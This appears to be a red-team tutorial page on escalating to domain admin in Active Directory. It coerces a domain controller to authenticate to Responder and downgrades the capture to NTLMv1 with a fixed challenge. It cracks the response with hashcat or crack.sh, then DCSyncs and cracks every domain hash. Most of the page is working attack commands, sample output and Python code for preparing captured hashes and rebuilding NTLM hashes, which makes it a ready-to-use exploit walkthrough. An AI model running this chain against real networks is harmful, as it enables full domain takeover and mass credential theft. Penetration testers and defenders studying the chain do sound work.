Red Teaming and Malware Analysis

Active Directory 101
From DFSCoercer to DA

Last updated 2 years ago

Attack Environment Setup

For the attack to be successful, there are four requirements:

  1. Any valid domain account credentials (Coercer authenticates to the target's RPC interfaces with them).

  2. Network connectivity to the target's SMB (Server Message Block) service, and from the target back to the host running Responder.

  3. The target host must expose a coercion method: the Print Spooler service for the MS-RPRN "printer bug", or the DFS namespace service (MS-DFSNM, the DFSCoerce method this page is named after). Coercer tries several such RPC interfaces and reports which ones the target answers.

  4. The target host must be allowed to send NTLMv1 responses (it cannot be set to enforce NTLMv2). The coerced host is the NTLM client in this attack, so it is its own LAN Manager authentication level that matters, not the one on the DC or the attacker's box.

To determine whether NTLMv1 responses can be sent, check secpol.msc at Security Settings\Local Policies\Security Options\Network security: LAN Manager authentication level (the LmCompatibilityLevel value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa). Vulnerable settings are levels 0 to 2, i.e. any of the following:

- Send LM & NTLM responses

- Send LM & NTLM – use NTLMv2 session security if negotiated

- Send NTLM responses only.

Step1: set responder challenge

First, ensure that Responder's challenge is set to 1122334455667788 in Responder.conf (the Challenge line; recent Responder versions default it to Random). A fixed, known challenge is what makes the captured response crackable with precomputed tables on crack.sh and lets hashcat attack the DES blocks directly, because the challenge is the DES plaintext.

Step2: Start Responder

sudo python3 /usr/share/responder/Responder.py -I eth0 -w --disable-ess --lm

Why --disable-ess and --lm?

Without them the captured response is NTLMv1 with Extended Session Security (ESS, what Responder labels NTLMv1-SSP): the client mixes a random client challenge into the DES input (the first 8 bytes of the MD5 of server challenge and client challenge), so the fixed 1122334455667788 is no longer the value the DES blocks were computed over and precomputed tables are useless. --disable-ess refuses ESS during negotiation and --lm forces the LAN Manager downgrade, giving a plain NTLMv1 response over the fixed challenge. If a client still negotiates ESS, ntlmv1-multi can derive the effective challenge from the client challenge stored in the LM field, which is what the SRV Challenge line in Step 5 is.

Step3: Use Coercer to test and execute the attack

Before starting, we can use crackmapexec to test whether the Print Spooler service is enabled on the target (if the null session is refused, use the domain credentials from requirement 1):

crackmapexec smb -u "" -p "" target_ip -M spooler

Then run Coercer (the coerce mode in version 2, Coercer.py in version 1) against target_ip with the valid domain credentials and the Responder host's IP as the listener address. Coercer's scan mode lists which of its coercion methods the target responds to, and the coerce mode makes the target's computer account authenticate to Responder over SMB.

Step4: Machine hash obtained

Responder prints the coerced computer account's NTLMv1 response (the user is the host name with a trailing $) in the user::domain:LMresponse:NTresponse:challenge form the next step expects; with the configuration above the last field is 1122334455667788. For the DCSync in Step 7 the coerced host must be a domain controller, because only DC computer accounts hold the directory replication rights that DCSync relies on.

Step5: Preparing the hash

python3 ntlmv1.py --ntlmv1 "hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788"

Hashfield Split:
['hashcat', '', 'DUSTIN-5AA37877', '85D5BC2CE95161CD00000000000000000000000000000000', '892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0', '1122334455667788']

Hostname: DUSTIN-5AA37877
Username: hashcat
LM Response: 85D5BC2CE95161CD00000000000000000000000000000000
NT Response: 892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0
Client Challenge: 1122334455667788
SRV Challenge: b36d2b9a8607ea77

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 1122334455667788 85D5BC2CE95161CD00000000000000000000000000000000

To crack with hashcat create a file with the following contents:
892F905962F76D32:b36d2b9a8607ea77
3837F613F88DE27C:b36d2b9a8607ea77

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
$NETLM$b36d2b9a8607ea77$892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0

Step 6: Cracking it or submit it to crack.sh

Cracking it online:

Submit the $NETLM$ token from Step 5 to crack.sh. The service looks the response up in rainbow tables built for a known challenge (which is why the fixed Responder challenge matters) and returns the NTLM hash.

Hashcat:

  1. Download the DES_full.charset file (the URL is in the Resources below); it lets hashcat enumerate every 8-byte DES key.

  2. Create a file named 14000.hash with the two lines from Step 5, one per 8-byte DES block, in ciphertext:plaintext form:

892F905962F76D32:b36d2b9a8607ea77
3837F613F88DE27C:b36d2b9a8607ea77

  3. Execute hashcat in mode 14000 (DES with known plaintext):

.\hashcat.exe -m 14000 -a 3 -1 .\charsets\DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

Mode 14000 brute-forces the 56-bit key of each block separately (the multi-day job mentioned in the Resources). The two recovered keys contain the first 14 bytes of the NTLM hash and ct3_to_ntlm from Step 5 supplies the last two bytes; together they give the full 32-character NTLM hash of the computer account.
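The preparation step above, re-implemented here as an added example (not code from this page or from ntlmv1-multi) so the arithmetic behind ntlmv1.py's output is visible: it parses the sample Responder line used in Step 5, detects Extended Session Security from the LM field, derives the effective server challenge, and emits the two hashcat 14000 lines, the ct3_to_ntlm arguments and the crack.sh token. It also carries the reverse direction the page only describes in prose: stripping the DES parity bits from the two cracked keys and appending the 2 bytes from ct3_to_ntlm to rebuild the NTLM hash. The sample line is the one already on the page; the assumption that cracked keys are handled as 8-byte hex strings in standard DES key layout (parity in bit 0) is mine, and the actual cracking still needs hashcat or crack.sh. Standard library only.

```python
import hashlib

# Constructed sample input: the NTLMv1 line this page feeds to ntlmv1.py, in the
# user::domain:LMresponse:NTresponse:challenge form Responder logs it in.
SAMPLE_LINE = ("hashcat::DUSTIN-5AA37877:"
               "85D5BC2CE95161CD00000000000000000000000000000000:"
               "892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:"
               "1122334455667788")


def parse_ntlmv1(line):
    """Split a Responder NTLMv1 capture into its fields; rejects NTLMv2 (longer NT blob)."""
    user, _, domain, lm_resp, nt_resp, challenge = line.strip().split(":")
    if len(lm_resp) != 48 or len(nt_resp) != 48 or len(challenge) != 16:
        raise ValueError("not a 24-byte NTLMv1 response with an 8-byte challenge")
    return {"user": user, "domain": domain, "lm_resp": lm_resp.upper(),
            "nt_resp": nt_resp.upper(), "challenge": challenge.lower()}


def uses_ess(lm_resp):
    """ESS (Responder's NTLMv1-SSP): the LM field is an 8-byte client challenge
    followed by 16 zero bytes instead of a real LM response."""
    return lm_resp[16:] == "0" * 32


def effective_challenge(lm_resp, challenge):
    """The 8 bytes the three DES blocks actually encrypted.

    Without ESS that is Responder's challenge itself. With ESS it is
    MD5(server_challenge || client_challenge)[:8] (MS-NLMP 3.3.1), which is
    why --disable-ess matters: the fixed challenge alone no longer suffices.
    """
    if uses_ess(lm_resp):
        client_challenge = lm_resp[:16]
        return hashlib.md5(bytes.fromhex(challenge + client_challenge)).digest()[:8].hex()
    return challenge.lower()


def prepare(line):
    """Everything Step 5 derives from one capture: the two hashcat -m 14000 lines
    (ciphertext:plaintext, one per 8-byte DES block), the ct3_to_ntlm arguments
    for the third block (only 2 unknown key bytes, NT hash bytes 14-15), and the
    crack.sh token in the form the page shows."""
    h = parse_ntlmv1(line)
    chal = effective_challenge(h["lm_resp"], h["challenge"])
    nt = h["nt_resp"]
    return {
        "challenge": chal,
        "hashcat_14000": [f"{nt[0:16]}:{chal}", f"{nt[16:32]}:{chal}"],
        "ct3_to_ntlm_args": (nt[32:48], h["challenge"], h["lm_resp"]),
        "cracksh_token": f"$NETLM${chal}${nt}",
    }


def des_key_to_7_bytes(key_hex):
    """Undo the NTLMv1 key expansion: each DES key byte carries 7 key bits in its
    high bits and a parity bit in bit 0, so dropping bit 0 of the 8 bytes and
    packing the 56 bits gives the 7 NTLM hash bytes the key was made from.
    Assumption: the cracked key is given as 8 bytes in standard DES key layout."""
    key = bytes.fromhex(key_hex)
    if len(key) != 8:
        raise ValueError("a DES key is 8 bytes")
    bits = 0
    for b in key:
        bits = (bits << 7) | (b >> 1)
    return bits.to_bytes(7, "big")


def seven_bytes_to_des_key(chunk):
    """The forward expansion NTLMv1 applies (parity bit left clear; DES ignores it)."""
    bits = int.from_bytes(chunk, "big")
    return bytes(((bits >> (49 - 7 * i)) & 0x7F) << 1 for i in range(8))


def assemble_ntlm(key1_hex, key2_hex, last4_hex):
    """NTLM hash = 7 bytes from DES key 1 || 7 bytes from DES key 2 || the 2 bytes
    (4 hex chars) that ct3_to_ntlm recovers from the third block."""
    if len(last4_hex) != 4:
        raise ValueError("ct3_to_ntlm yields exactly 4 hex characters")
    return (des_key_to_7_bytes(key1_hex) + des_key_to_7_bytes(key2_hex)).hex() + last4_hex.lower()


if __name__ == "__main__":
    prepared = prepare(SAMPLE_LINE)
    print("effective challenge:", prepared["challenge"])
    print("\n".join(prepared["hashcat_14000"]))
    print("ct3_to_ntlm", *prepared["ct3_to_ntlm_args"])
    print(prepared["cracksh_token"])
```

Running it on the sample line prints the same two 14000 lines, ct3_to_ntlm arguments and $NETLM$ token that ntlmv1.py shows in Step 5; the "SRV Challenge" there is the MD5-derived value because the sample capture negotiated ESS. Once hashcat has returned the two keys and ct3_to_ntlm the final four characters, assemble_ntlm gives the hash to pass to secretsdump in Step 7.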

Step7: NTLM hash obtained + secrets dump

After obtaining the cracked NTLM hash of the computer account, we need to pick a target user. The domain users can be dumped beforehand with ldapdomaindump or BloodHound. Once a domain admin account has been picked, a DCSync attack authenticated as the DC computer account (pass-the-hash, LM part left empty before the colon) pulls that user's secrets:

impacket-secretsdump -hashes :5###74f2###########dfd888b -just-dc-user target_username DOMAIN/MACHINE_NAME\$@10.20.2.2

The output contains the domain admin's NT hash, which can be used directly for pass-the-hash (for example with -hashes in the next step).

Step8: Dump AD users

With the domain admin's hash (or password), dump every account's NTLM hash from the DC. -just-dc-ntlm limits the DCSync to the NTLM hashes (no Kerberos keys), which is all the cracking step needs; pass -hashes :<NT hash> instead of a password to reuse the hash from Step 7.

impacket-secretsdump -just-dc-ntlm domain/user@10.0.0.6

Step9: Password cracking

After cracking the dumped NT hashes (hashcat mode 1000), the script below joins the secretsdump output with the cracked list so each user's cleartext can be counted:

python3 script_passwords.py hashes.txt cracked.txt

#!/usr/bin/env python3
# Usage: python3 script_passwords.py hashes.txt cracked.txt
#   hashes.txt  : secretsdump output, one "domain\user:rid:lmhash:nthash:::" per line
#   cracked.txt : hashcat potfile lines, "nthash:password"
# Writes output.txt with one "nthash:password" line per user whose NT hash was cracked.

import sys

if len(sys.argv) != 3:
    sys.exit("usage: script_passwords.py <hashes.txt> <cracked.txt>")

file_hashes, file_cracked = sys.argv[1], sys.argv[2]

print("---start process---")

with open(file_hashes) as f:
    hashes = [line.rstrip() for line in f if line.strip()]

with open(file_cracked) as f:
    cracked = [line.rstrip() for line in f if line.strip()]

# Index the cracked lines by NT hash (case-insensitive) so each user line is matched once.
cracked_by_nt = {}
for crack in cracked:
    nt_hash = crack.split(":", 1)[0].lower()
    cracked_by_nt[nt_hash] = crack

# secretsdump lines: domain\user:rid:lmhash:nthash:::  (the NT hash is the fourth field)
with open("output.txt", "w") as out:
    for line in hashes:
        fields = line.split(":")
        if len(fields) < 4:
            continue
        nt_hash = fields[3].lower()
        if nt_hash in cracked_by_nt:
            out.write(cracked_by_nt[nt_hash] + "\n")

The output.txt file is generated with one cracked hash:password line per user, so a password shared by several accounts appears several times.

Finally, the most common passwords can be seen with (identical passwords share an NT hash, so counting identical lines counts passwords):

cat output.txt | sort | uniq -c | sort -nr

Resources

Now that the DC's NTLMv1 hash has been captured, it can be cracked back into a plain NTLM hash, compatible with pass-the-hash attacks. This can be done quickly by submitting NTHASH:<response> to crack.sh, which uses rainbow tables, or by manually reconstructing the NTLM hash from its DES elements using hashcat and EvilMog's tool ntlmv1-multi (my hashcat rig with an NVIDIA 3090 takes around 16 days to brute-force the needed DES hashes).

- crack.sh – The World's Fastest DES Cracker
- Cracking NETLM/NETNTLMv1 Authentication (crack.sh)
- GitHub - evilmog/ntlmv1-multi: NTLMv1 Multitool
- GitHub - p0dalirius/Coercer: A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.
- DES_full.charset: https://raw.githubusercontent.com/brannondorsey/naive-hashcat/master/hashcat-3.6.0/charsets/DES_full.charset
- NTLMv1 to NTLM Reversing
- Elevating with NTLMv1 and the Printer Bug: https://www.fortalicesolutions.com/posts/elevating-with-ntlmv1-and-the-printer-bug